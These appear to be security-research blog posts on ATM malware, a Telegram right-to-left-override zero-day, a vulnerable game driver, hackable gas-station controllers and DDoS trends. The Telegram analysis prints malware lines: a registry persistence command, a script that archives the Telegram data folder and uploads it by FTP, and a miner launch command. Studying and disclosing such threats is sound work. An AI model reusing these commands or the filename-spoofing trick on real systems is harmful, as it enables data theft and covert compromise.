The suspect had previously worked for the Colombian police for 8 years as an electronic engineer specializing in computer security and also as a police investigator. At the time, he was in charge of large-scale investigations, but over the years he ended up leading a judicial file that surprised the investigators. On October 25th, he was arrested and charged by the authorities as the author of a multi-million fraud scheme aimed at a Colombian bank. At the time of his arrest, the criminal had remote access to 1,159 ATMs throughout Colombia. In the development of the illegal operation, the criminal used a modified legitimate ATM software, which left everything set for other members of the illegal organization to commit fraud in less than 48 hours in six different cities. This was the way Colombian media talked about the multi-million fraud against a local bank.

Insider with admin and remote access: 14 ATMs controlled and jackpotted in Colombia

To perform this attack the corrupted ex-police officer used a modified version of the ATM management software distributed by the manufacturer and their technical support staff. As an officer, he had access to this kind of software, which after installation, would interact with the XFS standard, sending commands to the ATM:

Legitimate software, misused: privileged access to steal money.

The target in this attack was Diebold ATM machines:

Target: Diebold ATM

Once the cybercriminal infected the ATMs with the mentioned legitimate but modified management software, a special access was granted. From that moment on, any kind of ATM malware could be installed, including Ploutus, which we saw was aggressively used in Peru and other South American countries.

Kaspersky Lab detects samples of the attack as: Trojan.MSIL.Agent and Backdoor.MSIL.Ploutus

Brazil: Prilex on top of the hill

Brazil is also notorious for developing and spreading locally built malware. The same can be said for their ATM and PoS malware. In 2017, we found an interesting new ATM malware family spread in-the-wild in Brazil. It’s developed from scratch in the country so the code doesn’t have similarities with any other known ATM malware family.

Prilex is an interesting ATM malware fully developed by Brazilian cybercriminals is Prilex. The criminals behind Prilex are also responsible for the development of several PoS malware, allowing them to target both ATM and PoS markets. The key difference of this attack is that instead of using the common XFS library to interact with the ATM sockets, it used some specified vendor’s libraries. Someone generously shared that information with the criminals.

Prilex’s piece of code with a lot of strings in Portuguese.

According to the code we analyzed, the cybercriminals behind it knew all about victim’s network diagram as well as the internal structure of the ATMs used by the bank. In one of the samples, we found a specific user account of someone working in the Bank. That may mean two things: an insider in the bank was leaking information to cybercriminals or the bank had suffered a targeted attack, which allowed the criminals to exfiltrate key information.

Command used to execute the process under specific credential.

Once the malware is running it has the capability of dispensing money from the sockets by using a special window which is activated by using a specific key combination, provided to the money mules by the criminals. There is also a component which reads and collects data from the magnetic stripe of the cards used it ATMs infected with Prilex. All information is stored in a locally saved file.

We believe that the group behind this malware family is not new. We had seen them running another campaign since at least 2015, not only for ATM but also PoS attacks.

Kaspersky Lab detects these malware families as Trojan.Win32.Ice5 and Trojan.Win32.Prilex, respectively.


ATMs have been under constant attack since at least 2008-2009, when the first malicious program targeting ATMs, known as Backdoor.Win32.Skimer, was discovered. This is probably the fastest way for cybercriminals to get money – just right from the ATM. When it happens, we see two losses categories for the banks:

  1. Direct bank losses, when an attacker obtains money from an ATM cash dispenser.
  2. Indirect banks losses but losses to its customers. In this second scenario, cybercriminals steal from the customers’ bank accounts cloning unique cardholder data from the users’ ATM (including Track2 – the magnetic stripe data, the PIN – personal identification number used as a password, or new authentication methods, such biometric data).

To achieve their goals, attackers must solve one of these key challenges – they must either bypass customer authentication mechanisms or bypass the ATM’s security mechanisms. Criminals already use various methods to profit from ATMs, such as ram-raiding and dynamite explosive attacks, or traditional skimmers and shimmers to obtain customers’ information. It’s obvious criminal methods are shifting from physical attacks to so-called logical attacks. These can be described as non-destructive attacks. This helps cybercriminals stay undetected for longer periods of time, stealing not just once but several times from the same infected ATM.

ATM security is a complex problem that should be addressed on different levels. Many problems can only be fixed by the ATM manufacturers or vendors, especially with direct cooperation of security vendors.

The vast majority of ATM malware attention is placed on Eastern Europe, as the most developed cybercrime scene is in that part of the world. However, Latin America is one of the most dynamic and challenging markets in the world due to its particular characteristics. Regional cybercriminals are constantly seeking help and trading knowledge with their “colleagues” from Eastern European countries.

The constant monitoring of malicious activities by Latin American cybercriminals provides IT security companies with an advantageous opportunity to discover new attacks related to the financial sector. To have a complete understanding of the Latin American cybercrime scene, antimalware companies need to pay close attention to the reality of the country, collect files locally, build local relationships, and keep local analysts to monitor these attacks, mostly because it’s common for criminals to be extremely vigilant about their creations and how far these propagate. As it happens in Russia and China, Latin American criminals have created their own unique reality that’s sometimes quite difficult to grasp from the outside.

It’s very important for Financial Institutions, being such big and important targets for cybercriminals all over the world, to work on Threat Intelligence, including, not just global feeds, but also IOCs and Yara rules from hard to spot local attacks from regional experts. Our complete IOCs list, as well as Yara rules and full reports are available for Financial Intelligence Reports service customers. Need more information about the service?

Reference hashes


Zero-day vulnerability in Telegram

Tue, 02/13/2018 - 04:00

In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this…

— Mikko Hypponen (@mikko) 15 июля 2013 г.

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

    • The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

  • The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:



  • When the user clicks on this file, the standard Windows security notification is displayed:


Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild

After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

Attack flowchart

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifying startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

(English translation) Function “Онлайн
(Online) Send list of files in directory to control bot. “Запус
(Launch) Launch executable file using Process.Start(). “Логгер
(Logger) Check if tor process is running, download, unpack it, delete the archive and launch its content. “Скачать
(Download) Download file into its own directory. “Удалить
(Delete) Delete file from its own directory. “Распаковать
(Unpack) Unpack archive in its own directory using specified password. Убить
(Kill) Terminate specified process using process.Kill() Скачат
(Download) Same as ‘Download’ (see above), with different command parsing. Запуск
(Launch) Same as ‘Launch’ (see above), with different command parsing. Удалить
(Delete) Same as ‘Delete’ (see above), with different command parsing. Распаковать
(Unpack) Same as ‘Unpack’ (see above), with different command parsing. Процессы
(Processes) Send a list of commands running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

Attack flowchart

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:


This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:
  • taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:


st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches when system is booted next time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
“%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive
ping -n 1 |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:

The miner itself is launched as follows:

WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp:// -u -p x -dbg -1″ & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:


It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC MD5 First stage




C2 servers




A vulnerable driver: lesson almost learned

Thu, 02/08/2018 - 05:00

Recently, we started receiving suspicious events from our internal sandbox Exploit Checker plugin. Our heuristics for supervisor mode code execution in the user address space were constantly being triggered, and an executable file was being flagged for further analysis. At first, it looked like we’d found a zero-day local privilege escalation vulnerability for Windows, but the sample that was triggering Exploit Checker events turned out to be the clean signed executable GundamOnline.exe, part of the multiplayer online game Mobile Suit Gundam Online from BANDAI NAMCO Online Inc.

The initial sample is packed using a custom packer and contains anti-analysis techniques that complicate static analysis. For example, it tries to detect if it’s being launched inside a virtual machine by performing a well-known VMware hypervisor detection routine. It first loads the EAX register with the hypervisor magic value VMXh, and the ECX register with the value 0x0A, which is a special command to receive the hypervisor version. Then it performs an ‘in’ command to the VMware hypervisor I\O port 0x5658. If the EBX register is overwritten with VMXh as a result of that operation, it means the executable file is running on the VMware machine.

Our sandbox execution logs showed that the user space memory page is called from the driver bandainamcoonline.sys immediately after IOCTL request 0xAA012044 to device object \\.\Htsysm7838 that is created by the driver. The driver itself is installed just before that. It is first dropped to the directory C:\Windows\SysWOW64\ by a GundamOnline executable, loaded using NtLoadDriver() and deleted immediately afterwards.

Normally, this kind of behavior should not be allowed due to SMEP (Supervisor Mode Execution Prevention). This is a security feature present on the latest Intel processors that restricts supervisor mode execution on user memory pages. Page type is determined using the User/Supervisor flag in the page table entry. If a user memory page is called while in supervisor execution mode, SMEP generates an access violation exception and, as a result, the system will trigger a bug check and halt. This is commonly referred to as a BSOD.

The dropped driver itself is a legitimate driver, signed with a certificate issued to NAMCO BANDAI Online Inc.

The certificate validity period tells us two things. First, this certificate has been valid since 2012, which could mean that the first vulnerable version of the driver was released around the same time. However, we were unable to find one; the earliest sample of bandainamcoonline.sys that we found dates back to November 2015. Secondly, because it expired more than three years ago, you could be forgiven for thinking it’s impossible to install a driver signed with this certificate in a system. Actually, there’s nothing stopping you from installing and loading a driver with an expired certificate validity period.

In order to find the cause of the heuristics trigger, we need to do a static analysis of the driver itself. In the DriverEntry function it first decodes the device object name string in memory, and then creates the device \\.\Htsysm7838. The other two encoded strings – bandainamcoonline and bandainamcoonline.sys – are not used in the driver.

The driver itself is very small and contains only three registered major functions. Function IRP_MJ_DEVICE_CONTROL, which handles requests, accepts only two IOCTLs: 0xAA012044 and 0xAA013044. When called, it checks the size of the input and output buffers and eventually calls the ExecuteUserspaceCode function, passing on the contents of the input buffer to it.

The function ExecuteUserspaceCode performs a single check on the input buffer, which contains a pointer to a user space function or a shellcode, and disables SMEP while saving old CR4 register values. It then calls that function, passing it a pointer to the MmGetSystemRoutineAddress as an argument. After that it restores the original register state, re-enabling SMEP.

To be able to directly call the user function from the provided pointer driver it is necessary to remove a specific bit in the CR4 register first to temporarily stop SMEP, which is what the DisableSMEP function does. The original CR4 values are then restored by the EnableSMEP function.

The vulnerability in this case is that other than the basic checks on the format of the input buffer, no additional checks are done. Therefore, any user on the system can use this driver to elevate their privileges and execute arbitrary code in the Ring 0 of the OS. Even if the driver is not present in the system, an attacker can register it with Windows API functions and exploit the flaw.

We realized that this vulnerability looks exactly like the one found in Capcom’s driver last year.

Binary diffing bandainamcoonline.sys and capcom.sys proves exactly that, showing there are almost no differences between the two drivers. The only slight variations are the encoded strings and digital signatures. Because the earliest sample of the vulnerable driver that we’ve been able to find dates to November 2015, it can be assumed that this vulnerability first appeared in the bandainamcoonline.sys driver – almost a year before a similar driver was used by Capcom.

We believe both drivers were almost certainly compiled from the same source code, as a part of an anti-hacking solution to prevent users from cheating in the game. The presence of functions that implicitly disable and re-enable SMEP show that this design decision was intentional. But because the driver makes no additional security checks, any user can call and exploit the vulnerable IO control code by using Windows APIs such as DeviceIoControl(). This essentially makes the driver a rootkit, allowing anyone to interact with the operating system at the highest privilege level. In fact, we found multiple malware samples (already detected by our products) using a previously known vulnerability in capcom.sys to elevate their privileges to System level.

After finding the vulnerability we contacted BANDAI NAMCO Online Inc. The vendor responded promptly and released a patch three days later. They removed the driver altogether, and it is no longer loaded by the game executable. This is very similar to what Capcom did, and is perfectly acceptable in this case.

Finding this vulnerability wouldn’t have been possible without our Exploit Checker technology, which is a plugin for our sandbox, and can be also found in KATA (Kaspersky Anti Targeted Attack Platform). The technology was designed to monitor suspicious events that occur at the earliest post-exploitation phases and can detect common techniques used in exploits, such as ROP, Heap Spray, Stack Pivot, and so on. In this particular case, multiple heuristics for executing code in supervisor mode in the user address space were triggered, and the sample was flagged for further analysis. If a token-swapping attempt was performed to elevate process privileges, a technique that’s widely used in LPE exploits, it would have been automatically detected by Exploit Checker heuristics.

Kaspersky Lab solutions detect the vulnerable drivers mentioned in this article as HEUR:HackTool.Win32.Banco.a and HEUR:HackTool.Win32.Capco.a.

Gas is too expensive? Let’s make it cheap!

Wed, 02/07/2018 - 05:00

A few months ago, while undertaking unrelated research into online connected devices, we uncovered something surprising and realized almost immediately that we could be looking at a critical security threat. What we found was a simple purple web interface that was in fact a link to a real-life gas station, and we suspected this link made the station remotely hackable.

Amihai Neiderman, then working for Azimuth security, and I investigated the findings. When our suspicions turned out to be true, we reported them to the vendor.

The story was covered recently by Motherboard VICE, and here we will share some of the technical details behind it. Further details of this research will be shared in early March at the Security Analyst Summit 2018 in Cancun.

The device we investigated was not just a tiny web interface. It was an embedded box running a Linux-based controller unit that was installed with a tiny httpd server.

According to its manufacturer, the controller’s software is a site automation device that is responsible for managing every component of the station, including dispensers, payment terminals and more.

More specifically, the controller is at the heart of the station and if an intruder finds a way to take over the box, the results could be catastrophic. Another worrying detail, discovered later in the research, was when the solution was installed – many instances were embedded in fueling systems over a decade ago and have been connected to the internet ever since.

Before the research, we honestly believed that all fueling systems, without exception, would be isolated from the internet and properly monitored. But we were wrong. With our experienced eyes, we came to realize that even the least skilled attacker could use this product to take over a fueling system from anywhere in the world.

Hide & seek

The fuel stations we found using this product carried a watermark that can be found by running a search query with just one keyword. Within a few seconds, all those that are connected reveal their exact location and listening services.

The following chart uses data from an online search engine and other sources to show the geographical spread of the fuel stations. We found that more than 1,000 gas stations are accessible from any computer in the world. And when it comes to IoT hacking, gas stations are a far more dangerous target than webcams, for example.

Top countries with gas stations open to the internet (data from Shodan and telemetry sources)

Most of the research involved reviewing the information available online. It seems that the manufacturer posted much of the device’s technical information, allowing clients to go online and grab it. The user manuals were very detailed. They included screenshots, default credentials, different commands and a step-by-step guide on how to access and manage each of the interfaces. That alone assisted us in gaining all the information we needed, before we even wrote a single line of code.

We understood how obsolete the device was when we realized it was operative and accessible remotely using services you don’t expect to see in modern devices. The user manual carefully listed the services it was using and the network architecture. Understanding how the device operates in the network doesn’t require special hacking skills.

Network layout showing the main controller unit and its access privileges

Default credentials

We found many places where default credentials were mentioned. Using the online search engine, we even saw proof that the services listed in the manual were scraped by the engine at some point in time. Since the engine itself is fairly new, it is believed that the services are also accessible. Among the rest, SSH, HTTP and X11 were marked as potential access backdoors.

Shift management login page with security issues allowing complete bypass

During the research, we were able to log in to one shift management console. But that was just one instance – how could we be sure that all the other stations were accessible as well? We needed to ask permission from a gas station owner to let us access the station when it was offline.

We wanted to understand what exactly was behind that web interface. Did it have the same functionality as a web camera, or could we actually find a critical issue that could cause major damage?

The shift management console

The console appeared very robust. Considering the level of technical knowledge a shift manager is required to have, the functionality would allow them to pretty much change the dispenser settings, including gas station prices, printer settings, shift reports and more. The risk here stems from a malicious insider – a shift manager can modify shift reports, printed receipts and the actual gas price. We believe that such privileges should be reserved for the gas station owner only. In addition, we suspect that there are more interfaces in the network which allow a shift employee to track the convenience store and payment terminal using high privileges as well. In the sketch above, there was no mention of any protection software in place.

Functionality to change gas prices available to gas station shift manager

The next step in the research was to verify if we could access the station remotely without any credentials. We started looking for creative ways to bypass the authentication mechanism. Presuming it was obsolete and not properly tested before being deployed, we didn’t expect it to take more than a day or two.

A snake in the haystack

We were positive that a coding vulnerability would be the first thing to surface, but it was something we least expected to find that first caught our attention.

Once the initial firmware dump and main binary reversing step was completed, we searched for the login mechanism within the decompiled code. To our surprise, the following ‘if’ condition was a core part of that mechanism. It was a hardcoded username and password. In other words, a manufacturer backdoor for cases when the device requires remote or local access with the highest privileges.

Hardcoded credentials, a zero-day vulnerability reserved with CVE-2017-14728

Every similar device belonging to that vendor, up to the version we found, contained these hardcoded credentials. We reported our findings to MITRE to reserve the CVE, and contacted the vendor.

In addition to hardcoded passwords, we found many areas that we suspect contain insecure code and which might allow code to be executed remotely. One of these components – soWebServer::XMLGetMeansReportRowsNumber code review boiled down to a name parameter which is being controlled by the end user and is prone to a stack-based buffer overflow attack. Based on that finding, we compiled a fully working remote code execution. Part of that code is in the following screenshot.

Code for remote login and stack buffer overflow

Another code area which captured our attention was an authentication component which contained SQL injection. Throughout the entire analysis, we haven’t found SQL injection preventions to be sufficient. This is one example:

Code to extract gas station’s name and location

Geo exploitation

It is perfectly plausible that an IP address shows the actual location of a gas station, but we wanted to dig even further into the code and understand whether a gas station owner actually inputs the name of the gas station, or any location ID that can be traced, to find the actual location, gas vendor and other information related to that location.

We found an XML component which is responsible for generating reports on a daily basis. It was found to contain a parameter that holds the actual name and location of the station. We wrote a quick proof of concept to simply extract this parameter’s value.

Code to extract gas station’s name and location

As said, the code was not tested globally, but in the one case we had, it did extract the name, which after a few searches retrieved the exact location, vendor name and contact details.

Update price

Given the possibility of utilizing the hardcoded credentials to access the SiteOmat’s web interface and tamper with the update_price.cgi component’s input parameters, an intruder would be able to change the fuel price. To reproduce such attempt, first thing that needs to be done is to extract the victim dispenser’s information in a JSON format, to better understand which products are being sold and for what price. This can be achieved using one of the XML files responsible for storing the real-time prices in the local database.

Code snippet taken from the price modification proof of concept

Each product has an ID, a gas type, a name following the type and price. An intruder only needs to modify the gas type in order to update the price.

Once the intruder decides which of the prices to change, they will have to query for the relative CGI component that changes the price.

The payment terminal

An intruder that gains access to the gas station is able to connect directly to the payment terminal, and either extract payment information or directly exploit the payment bridge to steal transactions. We did not cover that area in our research since we lacked the access to the gas station network, though we strongly believe that it requires inspection and testing.

What an intruder can do

To give you some idea of the capabilities an intruder gains when taking over a gas station system through the vulnerable device we uncovered, here are a few scenarios:

  • Shut down all fueling systems
  • Cause fuel leakage and risk of casualties
  • Change fueling price
  • Circumvent payment terminal to steal money
  • Scrape vehicle license plates and driver identities
  • Halt the station’s operation, demanding a ransom in exchange
  • Execute code on the controller unit
  • Move freely within the gas station network

To the best of our knowledge, the vulnerable gas stations have not yet been asked to disable remote access through this controller. On September of 2017, we alerted the vendor to the issues and offered to send full technical details to help ensure the vulnerabilities could be fixed.

The Motherboard Vice article referenced a recent incident in Moscow where a hacker helped to fraudulently siphon gas from customers using malicious code – but we do not believe this incident is related to the area of our research. Our online search did not find any gas stations in Russia with this controller installed, and a recent presentation in Moscow of our ongoing research did not make public the name of the product, its manufacturer or technical details of the vulnerabilities.

MITRE received reports on the vulnerabilities found during the research, though triage is still in process. CERT IL & US were also updated with details about the vulnerabilities.

Reported vulnerabilities – MITRE Reserved CVEs Description CVE-2017-14728 Hardcoded Administrator Credentials CVE-2017-14850 Persistent XSS CVE-2017-14851 SQL Injection CVE-2017-14852 Insecure Communication CVE-2017-14853 Code injection CVE-2017-14854 Buffer Overflow allows RCE

BSides NYC, a volunteer organized event put on by and for the community

Tue, 02/06/2018 - 05:00

Another edition of BSides NYC has passed, and as first time attendee and presenter, I was genuinely impressed with the impeccable organization, the content shared, and the interesting conversations that took place among enthusiasts and professionals from all over the world. I’ve been a long time follower and supporter of BSides events in Latin America, mainly due to the fact that they offer a relaxed venue for sharing and learning about the newest topics in information security, all while bringing together people from different backgrounds in a community-driven event.

This year’s edition of BSides NYC took place at the John Jay College of Criminal Justice, with faculty member and the deputy CISO of the City of New York opening the event along some additional memorable keynotes given by Runa Sandvik from the New York Times, and Amber Baldet from JP Morgan. Once the initial kick-off was done, each attendee was able to choose from two technical tracks, an entrepreneur track, or any of the available villages and workshops. It was certainly tough for everyone how to decide where to spend their time, taking a coffee break here and there to meet and greet colleagues, friends, and keep enjoying all the activities happening around.

After lunch, I began my presentation on “Threat hunting .NET malware with YARA”, giving some examples of how to use YARA and the newly added .NET module, particularly useful for tracking the growing number of malware relying on Microsoft’s flagship framework. For learning purposes I chose a very popular malware targeting Latin American ATMs named Ploutus, which has landed in US territory just recently. It was quite an experience to fit an entire day of YARA content in less than an hour, but fortunately everyone at the presentation was extremely supportive, whether they have been using the tool since the beginning or never heard about it before.


Then it was the turn for Dmitry Bestuzhev, Director of Kaspersky Lab’s Global Research and Analysis Team in Latin America, who gave an astonishing presentation titled “Moving like a Spook through Walls Or how to be only a shadow for APT detectors”. It’s always interesting to observe how the community sees the Latin American threat landscape, which sometimes would seem as it’s not getting the attention it deserves. There wasn’t enough room in the auditorium to fit all the people interested in the talk, however since coffee and pastries were waiting for us after the presentation, the conversation could be continued with all of those that were eager to keep the debate open.


The biggest surprise for me was the addition of an entrepreneur track, something that undoubtedly every attendee was thankful for. Sometimes we are guilty of getting lost in the technical side of things, forgetting about the business and how to actually make our idea reach the audience we want it to. There were presentations from different startups, and remarkable information on how to grow your business, monetize it, and ultimately how not to lose sight of your original concept or idea even when dealing with venture capitals and external pressures.

It’s one of those events that you can’t miss, whether it’s playing the custom capture the flag game with your team, building weird antennas in the hacking village, or participating in any of the tracks, you’ll find something in BSides NYC for you. Oh, and don’t forget, there’s always conference swag!

DDoS attacks in Q4 2017

Tue, 02/06/2018 - 04:01

News overview

In terms of DDoS attacks, the last quarter of 2017 was livelier than the previous one. Some major botnets were discovered and destroyed. For instance, early December saw the FBI, Microsoft, and Europol team up to knock out the Andromeda botnet, in operation since 2011. In late October, the Indian Computer Emergency Response Team (CERT) issued a warning about a massive botnet being assembled by a hacker group using the Reaper and IoTroop malware; earlier that same month, the spread of Sockbot through infected Google Play apps was detected and terminated.

Besides the various battles with Trojan-infested botnets, the last three months of 2017 were dominated by three main DDoS trends: politically motivated attacks, attempts to cash in on the soaring price of Bitcoin, and tougher law enforcement.

Politically motivated DDoS attacks remain eye-catching, but fairly ineffective. In late October again, during parliamentary elections in the Czech Republic, the country’s statistical office was hit by a DDoS attack in the middle of the vote count. The attack was a nuisance, but nothing more, and the results of the elections were duly announced on time.

Another DDoS-based political protest was aimed at the Spanish government in connection with the Catalan question. Hacktivists from the Anonymous group managed to take down the website of Spain’s Constitutional Court, and defaced the Ministry of Public Works and Transport’s website with the message “Free Catalonia.”

But politics is politics, and business is, well, just that. As we noted in the previous quarter, Bitcoin and everything associated with it has hit peak commercial popularity — not surprising, considering the explosive growth in its value. No sooner had Bitcoin spawned a new kind of cryptocurrency in the shape of Bitcoin Gold (BTG) than BTG sites immediately came under DDoS fire. After the price of the cryptocurrency took off in November, DDoS attacks rained down on the Bitfinex exchange — apparently with the aim of profiting from Bitcoin price fluctuations caused by denial of service. Still punch-drunk from the November attack, Bitfinex was paralyzed by two more onslaughts in early December.

On the topic of total failure, it would be amiss not to mention the shutdown of four shadow markets in the deep web used for all kinds of illegal trade: Trade Route, Tochka, Wall Street Market, and Dream Market. They have been operating erratically ever since October. It wasn’t clear at first what was behind these massive, well-coordinated attacks: the law enforcement agencies (as in the recent destruction of AlphaBay and Hansa) or competitors attempting to encroach on their territory. The subsequent attacks on all other trading platforms in early December dispelled most analysts’ doubts that it was a full-scale cyberwar between drug cartels.

However, the law — in particular, the judicial system — is not sitting idly by. Q4 saw a whole host of charges and sentences handed down in DDoS-related cases. The US judicial system was the most active: in mid-December, three defendants, Paras Jha, Josiah White, and Dalton Norman, confessed to being the brains behind the Mirai botnet.

And in late December, the founders of the notorious hacker groups Lizard Squad and PoodleCorp — Zachary Buchta of the U.S. and Bradley Jan Willem van Rooy of the Netherlands — were convicted.

In Britain, the high-profile case of young hacker Alex Bessell from Liverpool went to trial. Bessell was recently jailed for having launched a series of major cyber attacks in the period 2011-2013 against such giants as Skype, Google, and Pokemon. An even younger British hacker who targeted NatWest Bank, the National Crime Agency, Vodafone, the BBC, and Amazon was handed 16 months’ detention, suspended for two years.

A curious incident concerned 46-year-old John Gammell of Minnesota, who was charged with hiring three hacking services to create problems for his former employers, the websites of the judicial system of the district where he lived, and several other companies where he was once a contractor. The sponsors of DDoS attacks are often hard to track down, but Gammel couldn’t resist the temptation to tease his targets with emails — which led to his capture. As the investigators reported, the hacking services dealt with Gammel very professionally and cordially, thanking him for procuring their services and even upgrading his membership.

Quarter trends

Q4 demonstrated that DDoS attacks can be categorized as persistent online “crosstalk.” Junk traffic has become so widespread that server failure from too many requests might not be attack-related, but the accidental result of botnet side activities. For instance, in December we logged a huge number of requests to non-existent 2nd and 3rd level domains, which created an abnormal load on DNS servers in the RU zone. A modification of the Lethic Trojan turned out to be the culprit. This long-known malware comes in many different flavors, its main task being to allow spam traffic to pass through infected devices, basically like a proxy server.

The version we discovered was unlike most modifications in that it operates in multiple threads to create a huge number of requests to non-existent domains. The study found that this behavior was an attempt to mask the command-and-control (C&C) server addresses behind numerous junk requests, and the excessive load on the DNS servers was simply the result of the malware’s poor design. Nevertheless, DDoS attacks on DNS servers using junk requests are quite common and easy to implement. Our experts have assisted clients in many such instances. What’s interesting here is the method employed, as well as the perhaps unintended effect.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various complexity types and ranges. Company experts track the actions of botnets by using the DDoS Intelligence system.
Being part of the Kaspersky DDoS Prevention solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers and requires neither the infection of any user devices, nor the actual execution of cybercriminals’ commands.

This report contains DDoS Intelligence statistics for Q4 2017.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Also, bot requests originating from different botnets but directed at one resource count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited only to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools for performing DDoS attacks; thus, the data presented in this report do not cover every single DDoS attack that occurred during the specified period.

Quarter results
  • In Q4 2017, DDoS attacks were registered against targets in 84 countries (98 in Q3). However, as in the previous quarter, the overwhelming majority of attacks occurred in the top ten countries in the list (94.48% vs. 93.56%).
  • More than half of all attacks in Q4 (51.84%) were aimed at targets in China — almost unchanged since Q3 (51.56%).
  • In terms of both number of attacks and number of targets, South Korea, China, and the US remain out in front. But in terms of number of botnet C&C servers, Russia pulled alongside this trio: its relative share matched China’s.
  • The longest DDoS attack of Q4 2017 lasted 146 hours (just over six days). This is significantly shorter than the previous quarter’s record of 215 hours (almost nine days). 2017’s longest attack (277 hours) was registered in Q2.
  • The days before and after Black Friday and Cyber Monday saw increased activity on dummy Linux servers (honeypot traps), which lasted right up until the beginning of December.
